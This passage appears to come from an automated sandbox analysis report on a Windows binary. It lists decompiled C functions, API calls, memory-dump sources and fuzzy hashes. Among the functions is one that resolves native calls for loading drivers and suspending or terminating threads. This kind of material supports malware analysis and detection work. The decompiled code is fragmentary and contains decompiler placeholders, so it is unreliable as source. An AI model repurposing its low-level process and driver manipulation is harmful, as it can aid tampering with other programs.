                                                                                                                                                                  0x004079c5
                                                                                                                                                                  0x004079db
                                                                                                                                                                  0x004079f7
                                                                                                                                                                  0x00407a06
                                                                                                                                                                  0x00407a0c
                                                                                                                                                                  0x00407a11
                                                                                                                                                                  0x00407a13
                                                                                                                                                                  0x00407a14
                                                                                                                                                                  0x00407a17
                                                                                                                                                                  0x00407a18
                                                                                                                                                                  0x00407a1d
                                                                                                                                                                  0x00407a22
                                                                                                                                                                  0x00407a25
                                                                                                                                                                  0x00407a2a
                                                                                                                                                                  0x00407a35
                                                                                                                                                                  0x00407a3a
                                                                                                                                                                  0x00407a3b
                                                                                                                                                                  0x00407a40
                                                                                                                                                                  0x00407a52

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004079DB
                                                                                                                                                                    • Part of subcall function 0040ADF1: memcpy.MSVCRT(?,&lt;,00000008,00000000,?,?,004076E3), ref: 0040AE6E
                                                                                                                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                                                                  • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                  • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                                                                  • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                                                                  0x00404683
                                                                                                                                                                  0x00404692
                                                                                                                                                                  0x00404699
                                                                                                                                                                  0x0040469b
                                                                                                                                                                  0x004046af
                                                                                                                                                                  0x004046ba
                                                                                                                                                                  0x004046bc
                                                                                                                                                                  0x004046c7
                                                                                                                                                                  0x004046cc
                                                                                                                                                                  0x004046cd
                                                                                                                                                                  0x004046ee
                                                                                                                                                                  0x004046f3
                                                                                                                                                                  0x004046fa
                                                                                                                                                                  0x004046fa
                                                                                                                                                                  0x004046ee
                                                                                                                                                                  0x00404705

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004046AF
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen_snwprintfmemset
                                                                                                                                                                  • String ID: %s\shell\%s
                                                                                                                                                                  • API String ID: 1458959524-3196117466
                                                                                                                                                                  • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                  • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                                                                  • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                  • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                  			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                                                                  0x00409d5f
                                                                                                                                                                  0x00409d67
                                                                                                                                                                  0x00409d70
                                                                                                                                                                  0x00409ddb
                                                                                                                                                                  0x00409d72
                                                                                                                                                                  0x00409d74
                                                                                                                                                                  0x00409db2
                                                                                                                                                                  0x00409d84
                                                                                                                                                                  0x00409d84
                                                                                                                                                                  0x00409d8c
                                                                                                                                                                  0x00409d8d
                                                                                                                                                                  0x00409d98
                                                                                                                                                                  0x00409d9d
                                                                                                                                                                  0x00409d9e
                                                                                                                                                                  0x00409da6
                                                                                                                                                                  0x00409daf
                                                                                                                                                                  0x00409daf
                                                                                                                                                                  0x00409dc3
                                                                                                                                                                  0x00409dc3

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 00409D79
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                  • String ID: "%s"
                                                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                                                  • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                  • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                                                                  • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                  • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                                  			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                                                                  0x004047d2
                                                                                                                                                                  0x004047da
                                                                                                                                                                  0x004047e0
                                                                                                                                                                  0x004047e4
                                                                                                                                                                  0x004047ec
                                                                                                                                                                  0x004047ec
                                                                                                                                                                  0x004047f5
                                                                                                                                                                  0x00404800
                                                                                                                                                                  0x00404801
                                                                                                                                                                  0x00404802
                                                                                                                                                                  0x0040480d
                                                                                                                                                                  0x00404812
                                                                                                                                                                  0x00404813
                                                                                                                                                                  0x00404834

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                                                                  • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                  • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                  • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                                                                  0x004068ec
                                                                                                                                                                  0x004068f0
                                                                                                                                                                  0x004068f4
                                                                                                                                                                  0x004068ff
                                                                                                                                                                  0x00406902
                                                                                                                                                                  0x0040690a
                                                                                                                                                                  0x00406910
                                                                                                                                                                  0x00406911
                                                                                                                                                                  0x0040691b
                                                                                                                                                                  0x0040691e
                                                                                                                                                                  0x00406923
                                                                                                                                                                  0x0040692d
                                                                                                                                                                  0x0040692e
                                                                                                                                                                  0x00406933
                                                                                                                                                                  0x0040693d
                                                                                                                                                                  0x00406940
                                                                                                                                                                  0x00406949
                                                                                                                                                                  0x0040694a
                                                                                                                                                                  0x00406950
                                                                                                                                                                  0x00406956
                                                                                                                                                                  0x00406959
                                                                                                                                                                  0x0040695c
                                                                                                                                                                  0x00406964
                                                                                                                                                                  0x0040696d
                                                                                                                                                                  0x00406974
                                                                                                                                                                  0x0040697e
                                                                                                                                                                  0x00406989
                                                                                                                                                                  0x00406990
                                                                                                                                                                  0x00406998
                                                                                                                                                                  0x0040699b
                                                                                                                                                                  0x0040699f
                                                                                                                                                                  0x004069b8
                                                                                                                                                                  0x004069bc
                                                                                                                                                                  0x004069c4
                                                                                                                                                                  0x004069c7
                                                                                                                                                                  0x004069c7
                                                                                                                                                                  0x004069cb
                                                                                                                                                                  0x004069ce
                                                                                                                                                                  0x004069d4
                                                                                                                                                                  0x004069d4
                                                                                                                                                                  0x004069d9
                                                                                                                                                                  0x004069df
                                                                                                                                                                  0x004069e6
                                                                                                                                                                  0x004069ea
                                                                                                                                                                  0x004069ef
                                                                                                                                                                  0x004069f2
                                                                                                                                                                  0x004069f5
                                                                                                                                                                  0x00406a00
                                                                                                                                                                  0x00406a01
                                                                                                                                                                  0x00406a06
                                                                                                                                                                  0x00406a08
                                                                                                                                                                  0x00406a0b
                                                                                                                                                                  0x00406a10
                                                                                                                                                                  0x00406a16
                                                                                                                                                                  0x00406a25
                                                                                                                                                                  0x00406a25
                                                                                                                                                                  0x00406a18
                                                                                                                                                                  0x00406a1e
                                                                                                                                                                  0x00406a1e
                                                                                                                                                                  0x00406a27
                                                                                                                                                                  0x00406a2f
                                                                                                                                                                  0x00406a32
                                                                                                                                                                  0x00406a35
                                                                                                                                                                  0x00406a3b
                                                                                                                                                                  0x00406a41
                                                                                                                                                                  0x00406a47
                                                                                                                                                                  0x00406a4d
                                                                                                                                                                  0x00406a53
                                                                                                                                                                  0x00406a5d
                                                                                                                                                                  0x00406a6d

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                                                                  • memcpy.MSVCRT(?,0040F008,00000014), ref: 0040696D
                                                                                                                                                                  • memcpy.MSVCRT(?,0040F01C,00000014,?,0040F008,00000014), ref: 0040697E
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32 ref: 00405C59
                                                                                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT(00000000,00000002,?,?,00403490), ref: 00405C99
                                                                                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 975042529-0
                                                                                                                                                                  • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                  • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                  • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                                                                  0x004097b1
                                                                                                                                                                  0x004097b9
                                                                                                                                                                  0x004097bb
                                                                                                                                                                  0x004097be
                                                                                                                                                                  0x004097c3
                                                                                                                                                                  0x004097ca
                                                                                                                                                                  0x004097de
                                                                                                                                                                  0x004097de
                                                                                                                                                                  0x004097e3
                                                                                                                                                                  0x004097e5
                                                                                                                                                                  0x004097e5
                                                                                                                                                                  0x004097ec
                                                                                                                                                                  0x004097f3
                                                                                                                                                                  0x004097f6
                                                                                                                                                                  0x004097fe
                                                                                                                                                                  0x00409802
                                                                                                                                                                  0x00409805
                                                                                                                                                                  0x0040980a
                                                                                                                                                                  0x0040980d
                                                                                                                                                                  0x00409810
                                                                                                                                                                  0x00409822
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409827
                                                                                                                                                                  0x0040982a
                                                                                                                                                                  0x004098da
                                                                                                                                                                  0x004098da
                                                                                                                                                                  0x004098dc
                                                                                                                                                                  0x004098e0
                                                                                                                                                                  0x004098e9
                                                                                                                                                                  0x004098ec
                                                                                                                                                                  0x004098f6
                                                                                                                                                                  0x004098f6
                                                                                                                                                                  0x004098e2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004098e2
                                                                                                                                                                  0x00409830
                                                                                                                                                                  0x00409833
                                                                                                                                                                  0x00409838
                                                                                                                                                                  0x0040983b
                                                                                                                                                                  0x0040983e
                                                                                                                                                                  0x0040985f
                                                                                                                                                                  0x0040985f
                                                                                                                                                                  0x00409861
                                                                                                                                                                  0x00409863
                                                                                                                                                                  0x0040989e
                                                                                                                                                                  0x004098b1
                                                                                                                                                                  0x004098b8
                                                                                                                                                                  0x004098c0
                                                                                                                                                                  0x004098c5
                                                                                                                                                                  0x004098d5
                                                                                                                                                                  0x00409865
                                                                                                                                                                  0x00409865
                                                                                                                                                                  0x00409865
                                                                                                                                                                  0x0040986c
                                                                                                                                                                  0x00409878
                                                                                                                                                                  0x0040987f
                                                                                                                                                                  0x0040988a
                                                                                                                                                                  0x0040988f
                                                                                                                                                                  0x0040988f
                                                                                                                                                                  0x0040986c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409863
                                                                                                                                                                  0x00409840
                                                                                                                                                                  0x00409843
                                                                                                                                                                  0x00409846
                                                                                                                                                                  0x0040984b
                                                                                                                                                                  0x00409852
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409854
                                                                                                                                                                  0x0040985d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040985d
                                                                                                                                                                  0x00409894
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409894

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,004097C3), ref: 00408E5B
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver,?,004097C3), ref: 00408E6D
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver,?,004097C3), ref: 00408E7F
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,004097C3), ref: 00408E91
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,004097C3), ref: 00408EA3
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject,?,004097C3), ref: 00408EB5
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread,?,004097C3), ref: 00408EC7
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose,?,004097C3), ref: 00408ED9
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread,?,004097C3), ref: 00408EEB
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread,?,004097C3), ref: 00408EFD
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread,?,004097C3), ref: 00408F0F
                                                                                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread,?,004097C3), ref: 00408F21
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                                                                  • memset.MSVCRT ref: 00409805
                                                                                                                                                                  • memcpy.MSVCRT(-00000214,00000020,00000008,?,00000000,00003E80,?), ref: 0040988A
                                                                                                                                                                  • memcpy.MSVCRT(?,00000020,00000008,?,00000000,00003E80,?), ref: 004098C0
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3641025914-0
                                                                                                                                                                  • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
